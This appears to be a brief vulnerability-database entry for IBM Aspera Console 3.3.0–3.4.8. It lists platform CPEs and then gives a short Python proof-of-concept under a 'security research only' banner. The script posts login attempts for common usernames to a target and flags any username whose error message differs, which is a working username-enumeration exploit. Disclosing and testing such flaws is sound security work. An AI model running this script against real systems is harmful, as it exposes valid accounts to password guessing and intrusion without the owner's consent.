cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM Aspera Console 3.3.0 - 3.4.8
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
target = 'http://target-host/aspera/console'
usernames = ['admin', 'user', 'test', 'administrator']
for user in usernames:
response = requests.post(f'{target}/login', data={'username': user, 'password': 'wrong'})
if 'User does not exist' not in response.text:
print(f'Valid username found: {user}')